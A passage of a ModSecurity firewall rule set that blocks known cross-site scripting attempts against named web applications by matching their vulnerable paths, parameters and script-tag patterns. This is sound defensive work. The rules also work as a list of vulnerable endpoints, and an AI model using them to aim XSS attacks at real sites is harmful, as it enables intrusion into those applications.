Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:Scoring/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Scoring XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010176) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp MessagePart XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010176,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp MessagePart XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:MessagePart/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp MessagePart XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010177) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp Queue XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010177,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp Queue XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:Queue/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp Queue XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010178) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp FileName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010178,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp FileName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:FileName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp FileName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010179) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp IsolatedMessageID XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010179,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp IsolatedMessageID XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:IsolatedMessageID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp IsolatedMessageID XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010180) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp ServerName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010180,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp ServerName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:ServerName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp ServerName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003916) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WikkaWiki (Wikka Wiki) XSS Attempt -- usersettings.php name SecRule REQUEST_LINE "@contains /usersettings.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003916,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WikkaWiki (Wikka Wiki) XSS Attempt -- usersettings.php name',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23894'" SecRule &TX:'/XSS.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WikkaWiki (Wikka Wiki) XSS Attempt -- usersettings.php name',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004574) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WikyBlog XSS Attempt sessionRegister.php SecRule REQUEST_LINE "@contains /include/sessionRegister.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004574,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WikyBlog XSS Attempt sessionRegister.php',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25308'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WikyBlog XSS Attempt sessionRegister.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003885) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php SecRule REQUEST_LINE "@contains /sidebar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003885,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467360/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011006) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/nextgen-gallery/xml/media-rss.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011006,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-1186'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:mode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011107) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-cumulus/tagcloud.swf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011107,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains mode=tags" "chain" SecRule &TX:'/XSS.*ARGS:tagcloud/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004557) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS @Mail XSS Attempt -- ReadMsg.php SecRule REQUEST_LINE "@contains /ReadMsg.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004557,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS @Mail XSS Attempt -- ReadMsg.php',tag:'web-application-attack',tag:'cve,CVE-2007-2825'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS @Mail XSS Attempt -- ReadMsg.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011115) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cPanel fileop Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /frontend/x3/files/fileop.html" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011115,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS cPanel fileop Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,37394'" SecRule &TX:'/XSS.*ARGS:fileop/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cPanel fileop Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003875) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS fotolog XSS Attempt -- all_photos.html user SecRule REQUEST_LINE "@contains /all_photos.html" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003875,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS fotolog XSS Attempt -- all_photos.html user',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468316/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fotolog XSS Attempt -- all_photos.html user',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009671) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS millionpixel payment.php order_id XSS attempt SecRule REQUEST_LINE "@contains /users/payment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009671,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS millionpixel payment.php order_id XSS attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/millionpixel-xss.txt'" SecRule ARGS_NAMES "(?i:order_id)" "chain" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains <script>" "chain" SecRule REQUEST_LINE "@contains </script>" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS millionpixel payment.php order_id XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004552) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpPgAdmin XSS Attempt -- sqledit.php server SecRule REQUEST_LINE "@contains /sqledit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004552,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpPgAdmin XSS Attempt -- sqledit.php server',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24115'" SecRule &TX:'/XSS.*ARGS:server/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpPgAdmin XSS Attempt -- sqledit.php server',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003167) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS tikiwiki featured link XSS attempt SecRule REQUEST_LINE "@contains /tiki-featured_link.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003167,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS tikiwiki featured link XSS attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/450268/30/0'" SecRule ARGS_NAMES "(?i:type)" "chain" SecRule REQUEST_LINE "@contains /iframe>" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS tikiwiki featured link XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003874) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vDesk Webmail XSS Attempt -- printcal.pl SecRule REQUEST_LINE "@contains /printcal.pl" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003874,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS vDesk Webmail XSS Attempt -- printcal.pl',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24022'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vDesk Webmail XSS Attempt -- printcal.pl',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Euchia CMS catalogo.php id_livello Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /catalogo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011571,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Euchia CMS catalogo.php id_livello Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:id_livello/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Euchia CMS catalogo.php id_livello Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011566) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Easypush Server Manager addressbook.cgi page Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /addressbook.cgi" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011566,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Easypush Server Manager addressbook.cgi page Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains show=search" "chain" SecRule &TX:'/XSS.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Easypush Server Manager addressbook.cgi page Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CSSTidy css_optimiser.php url Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/csstidy/css_optimiser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011383,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS CSSTidy css_optimiser.php url Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:url/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CSSTidy css_optimiser.php url Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011423) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cacti cacti/utilities.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /cacti/utilities.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011423,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Cacti cacti/utilities.php Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-2545'" SecRule &TX:'/XSS.*ARGS:filter/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cacti cacti/utilities.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011452) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dance Studio Manager dailyview.php date Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /dailyview.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011452,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Dance Studio Manager dailyview.php date Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:date/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dance Studio Manager dailyview.php date Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Lantern CMS intPassedLocationID Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /html/11-login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011845,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Lantern CMS intPassedLocationID Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,43865'" SecRule &TX:'/XSS.*ARGS:intPassedLocationID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Lantern CMS intPassedLocationID Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011852) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /news/search.php3" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011852,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,44370'" SecRule &TX:'/XSS.*ARGS:bn/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011927) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SiteloomCMS mailform_1 variable Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011927,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS SiteloomCMS mailform_1 variable Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:mailform_1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SiteloomCMS mailform_1 variable Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/vodpod-video-gallery/vodpod_gallery_thumbs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011942,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:gid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012009) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/feedlist/handler_image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012009,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:i/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012011) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Horde IMP fetchmailprefs.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /fetchmailprefs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012011,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Horde IMP fetchmailprefs.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains actionID=fetchmail_prefs_save" "chain" SecRule REQUEST_LINE "@contains fm_driver=imap" "chain" SecRule &TX:'/XSS.*ARGS:fm_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Horde IMP fetchmailprefs.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ZyXEL P-660R-T1 HomeCurrent_Date Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /Forms/home_1" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012023,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ZyXEL P-660R-T1 HomeCurrent_Date Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:HomeCurrent_Date/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ZyXEL P-660R-T1 HomeCurrent_Date Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012040) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Contenido idart Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /en/front_content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012040,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Contenido idart Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:idart/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Contenido idart Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012070) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /admin/upgrade_unattended.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012070,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:db_type/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012072) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-safe-search/wp-safe-search-jx.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012072,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:v1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012164) 